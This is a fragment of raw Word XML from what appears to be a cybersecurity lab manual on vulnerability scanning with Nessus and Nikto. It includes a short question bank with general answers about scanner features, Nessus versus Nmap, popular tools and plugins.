              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40F9E350" w14:textId="11888822" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3"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 xml:space="preserve">The students will be able to find all the vulnerabilities present in the target </w:t>
            </w:r>
            <w:r w:rsidR="00105D43" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D925073" w14:textId="0734A2E2" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3"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 xml:space="preserve">Will also understand the Nessus Vulnerability scanner </w:t>
            </w:r>
            <w:r w:rsidR="00105D43" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01252432"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01D1E8E8" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="206CE002"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0BDA7F57" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5853D6D4" w14:textId="7294C5C2" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Use NIKTO &amp; Nessus tool to find all the vulnerabilities with its level and generate a report for an </w:t>
            </w:r>
            <w:r w:rsidR="00105D43" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>organization.</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23655746"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63582270" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CE0C2E7"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05A201B9" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3328CCAE" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Packet sniffer:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F410B13" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>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It has a database of vulnerabilities based on which it performs the check on the remote host.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D52A5E7" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>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Its database contains all the information required (service, port, packet type, a potential path to exploit, etc.) to check the security issue.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B36C21" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>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They can scan the network and websites against thousands of vulnerabilities, provide the list of issues based on the risk and suggest the remediation as well.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C480654" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B78BEB0"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noProof/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456C83AD" wp14:editId="6F045538">
                  <wp:extent cx="5975350" cy="3124200"/>
                  <wp:effectExtent l="19050" t="0" r="101600" b="0"/>
                  <wp:docPr id="180" name="Diagram 180">
                    <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C58AAF-2F33-4461-89A9-8F6FB73589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2384267"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124D957C" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="472E054B"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lastRenderedPageBreak/>
              <w:t>Question Bank:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B8DE995" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E46E314" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>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at are the features of popular Vulnerability scanning tools?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C9DB2AD" w14:textId="77777777" w:rsidR="00082E33" w:rsidRPr="00082E33" w:rsidRDefault="00082E33" w:rsidP="00082E33">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00082E33">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Popular vulnerability scanning tools typically offer a range of features including:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78DC9865"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Identification of vulnerabilities in software and hardware systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41CF5D24"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Automated scans and assessments of network devices, operating systems, applications, and databases.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B35110F"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Detection of security misconfigurations and weaknesses in authentication, authorization, encryption, and access controls.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDC4444"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Risk assessment and prioritization of vulnerabilities based on severity, impact, and exploitability.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1633BA0D"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Reporting and documentation of scan results, including recommended remediation steps and compliance checks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="597533ED" w14:textId="77777777" w:rsidR="00082E33" w:rsidRPr="00306C4A" w:rsidRDefault="00082E33" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Integration with other security tools and platforms, such as SIEM, IDS/IPS, and patch management systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C43DB4" w14:textId="77777777" w:rsidR="003418B7" w:rsidRPr="001C411D" w:rsidRDefault="003418B7" w:rsidP="003418B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="208249F6" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>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Differentiate between NESSUS and NMAP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF0F6F4" w14:textId="19FFD319" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00082E33" w:rsidP="00F6034E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>NESSUS and NMAP are both network scanning tools, but they differ in their functionality and usage. NESSUS is primarily a vulnerability scanner that detects and assesses vulnerabilities in systems and applications, while NMAP is a port scanner that identifies open ports, services, and hosts on a network. NESSUS uses a database of known vulnerabilities and exploits to perform scans, while NMAP uses various techniques to determine the status of network hosts and services, including TCP/IP fingerprinting, OS detection, and version scanning.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1799E9E4" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00F6034E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="415C3816" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>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lastRenderedPageBreak/>
              <w:t xml:space="preserve">List the top </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Vulnerability scanner tools.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46DC8C73" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00F6034E" w:rsidRDefault="00F6034E" w:rsidP="00F6034E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6034E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Some of the top vulnerability scanner tools include:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1604EA6D"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NESSUS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A2187C"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OpenVAS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4692326D"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Qualys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A55038"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Rapid7 Nexpose</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E035F44" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Acunetix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="126A9556"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Burp Suite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DEFD1CC"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Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14503283" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Retina</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705A7438" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="001C411D" w:rsidRDefault="00F6034E" w:rsidP="00F6034E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09E0760B" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>List 4 applications of NESSUS tool.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508CAF02" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00F6034E" w:rsidRDefault="00F6034E" w:rsidP="00F6034E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6034E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Some applications of NESSUS tool include:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4022D07E" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Vulnerability assessment and management</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A559C7" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Compliance checking for industry standards and regulations such as PCI-DSS, HIPAA, and SOX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C71DF43" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Network and system auditing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2B83CB" w14:textId="6F10FF1B" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Malware detection and analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E16C02" w14:textId="77777777" w:rsidR="00F6034E" w:rsidRPr="00306C4A" w:rsidRDefault="00F6034E" w:rsidP="00F6034E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="089F68DE" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>What is a Plugin?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="031D3381" w14:textId="2A84065F" w:rsidR="00F6034E" w:rsidRPr="001C411D" w:rsidRDefault="00F6034E" w:rsidP="00F6034E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1F497D" w:themeColor="text2"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">In the context of vulnerability scanning tools, a plugin is a software module that is used to </w:t>
            </w:r>
            <w:r w:rsidRPr="00306C4A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>perform a specific task or analysis on a system or application. Plugins are used to extend the functionality of the scanning tool, allowing it to identify and assess vulnerabilities in different types of software and hardware configurations. Plugins can be developed by the vendor of the scanning tool or by third-party developers, and they may be specific to certain operating systems, applications, or network devices. The plugins are typically updated frequently to keep up with new vulnerabilities and exploits.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F1D3206" w14:textId="4FAFE3CC" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05288E51" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE874B1" w14:textId="77777777" w:rsidR="00250D34" w:rsidRPr="001C411D" w:rsidRDefault="00250D34" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
